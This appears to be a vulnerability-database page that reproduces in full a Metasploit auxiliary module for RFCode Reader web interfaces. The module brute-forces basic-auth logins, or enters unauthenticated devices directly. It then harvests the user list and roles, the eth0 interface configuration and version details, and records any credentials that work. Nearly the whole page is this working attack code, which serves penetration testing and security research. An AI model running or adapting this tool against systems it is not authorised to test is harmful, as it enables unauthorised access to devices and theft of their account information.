Lucene search
K

RFCode Reader Web Interface Login / Bruteforce Utility

🗓️ 07 Jun 2013 18:23:09Reported by Karn Ganeshen <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 10 Views

RFCode Reader Web Interface Login / Bruteforce Utility. Module attempts to login to a RFCode Reader web interface, capturing users, interface configuration, and device platform details

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'RFCode Reader Web Interface Login / Bruteforce Utility',
      'Description'    => %{
        This module simply attempts to login to a RFCode Reader web interface.
        Please note that by default there is no authentication. In such a case, password brute force will not be performed.
        If there is authentication configured, the module will attempt to find valid login credentials and capture device information.
      },
      'Author'         =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'License'	 => MSF_LICENSE

    ))

    register_options(
      [
        OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", true])
      ])

  end

  #
  # Info-Only
  # Identify logged in user: /rfcode_reader/api/whoami.json
  # Capture list of users: /rfcode_reader/api/userlist.json
  # Interface configuration: /rfcode_reader/api/interfacestatus.json
  # Device platform details: /rfcode_reader/api/version.json
  #

  def run_host(ip)
    unless is_app_rfreader?
      print_error("#{rhost}:#{rport} - Application does not appear to be RFCode Reader. Module will not continue.")
      return
    end

    print_status("#{rhost}:#{rport} - Checking if authentication is required...")
    unless is_auth_required?
      print_warning("#{rhost}:#{rport} - Application does not require authentication.")
      user = ''
      pass = ''

      # Collect device platform & configuration info
      collect_info(user, pass)
      return
    end

    print_status("#{rhost}:#{rport} - Brute-forcing...")
    each_user_pass do |user, pass|
      do_login(user, pass)
    end
  end

  #
  # What's the point of running this module if the app actually isn't RFCode Reader?
  #
  def is_app_rfreader?
    res = send_request_cgi(
      {
        'uri' => '/rfcode_reader/api/whoami.json',
        'vars_get' =>
          {
            '_dc' => '1369680704481'
          }
      })
    return (res and res.code != 404)
  end

  #
  # The default install of RFCode Reader app does not require authentication. Instead, it'll log the
  # user right in. If that's the case, no point to brute-force, either.
  #
  def is_auth_required?
    user = ''
    pass = ''

    res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

    return (res and res.body =~ /{  }/) ? false : true
  end

  #
  # Brute-force the login page
  #
  def do_login(user, pass)

    vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
    begin
      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/whoami.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'	=>
          {
            '_dc' => '1369680704481'
          }
      })

      if not res or res.code == 401
        vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect} with code #{res.code}")
      else
        print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")

        collect_info(user, pass)

        report_cred(
          ip: rhost,
          port: rport,
          service_name: 'RFCode Reader',
          user: user,
          password: pass,
          proof: res.code.to_s
        )
        return :next_user
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
      return :abort
    end
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  #
  # Collect target info
  #
  def collect_info(user, pass)

    vprint_status("#{rhost}:#{rport} - Collecting information from app as #{user.inspect}:#{pass.inspect}...")
    begin

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/version.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370460180056'
          }
      })

      if res and res.body
        release_ver = JSON.parse(res.body)["release"]
        product_name = JSON.parse(res.body)["product"]

        vprint_status("#{rhost}:#{rport} - Collecting device platform info...")
        vprint_good("#{rhost}:#{rport} - Release version: '#{release_ver}', Product Name: '#{product_name}'")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname  => "RFCode Reader",
          :data   => "Release Version: #{release_ver}, Product: #{product_name}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/userlist.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1370353972710'
          }
      })

      if res and res.body
        userlist = JSON.parse(res.body)
        vprint_status("#{rhost}:#{rport} - Collecting user list...")
        vprint_good("#{rhost}:#{rport} - User list & role: #{userlist}")

        report_note(
          :host   => rhost,
          :proto  => 'tcp',
          :port   => rport,
          :sname	=> "RFCode Reader",
          :data   => "User List & Roles: #{userlist}",
          :type	=> 'Info'
        )
      end

      res = send_request_cgi(
      {
        'uri'       => '/rfcode_reader/api/interfacestatus.json',
        'method'    => 'GET',
        'authorization' => basic_auth(user,pass),
        'vars_get'      =>
          {
            '_dc' => '1369678668067'
          }
      })

      if res and res.body
        eth0_info = JSON.parse(res.body)["eth0"]
        vprint_status("#{rhost}:#{rport} - Collecting interface info...")
        vprint_good("#{rhost}:#{rport} - Interface eth0 info: #{eth0_info}")

        report_note(
          :host	=> rhost,
          :proto	=> 'tcp',
          :port	=> rport,
          :sname	=> "RFCode Reader",
          :data	=> "Interface eth0: #{eth0_info}",
          :type	=> 'Info'
        )
      end

      return
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{rhost}:#{rport} - HTTP Connection Failed while collecting info")
      return
    rescue JSON::ParserError
      vprint_error("#{rhost}:#{rport} - Unable to parse JSON response while collecting info")
      return
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation